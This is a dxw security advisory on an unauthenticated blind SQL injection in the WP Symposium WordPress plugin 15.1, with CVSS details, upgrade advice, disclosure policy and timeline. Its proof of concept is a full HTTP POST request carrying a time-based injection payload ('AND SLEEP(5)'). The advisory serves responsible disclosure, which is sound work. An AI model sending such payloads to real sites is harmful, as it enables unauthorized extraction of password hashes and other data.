Details ================ Software: WP Symposium Version: 15.1 Homepage: https://wordpress.org/plugins/wp-symposium Advisory report: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/ CVE: Awaiting assignment CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:P) Description ================ Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data Vulnerability ================ An unauthenticated user can run blind sql injection of the site and extract password hashes and other information from the database. Proof of concept ================ Perform the following POST to a site with the plugin installed. The request will take over 5 seconds to respond: POST /wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://127.0.0.1/wordpress/ Content-Length: 51 Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1421717320 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0 Mitigations ================ Upgrade to version 15.8 or later Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/ Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2015-03-02: Discovered 2015-07-14: Reported to simon@wpsymposium.com 2015-07-14: Requested CVE 2015-08-07: Vendor confirmed fixed in version 15.8 2015-08-10: Published Discovered by dxw: ================ Glyn Wintle Please visit security.dxw.com for more information.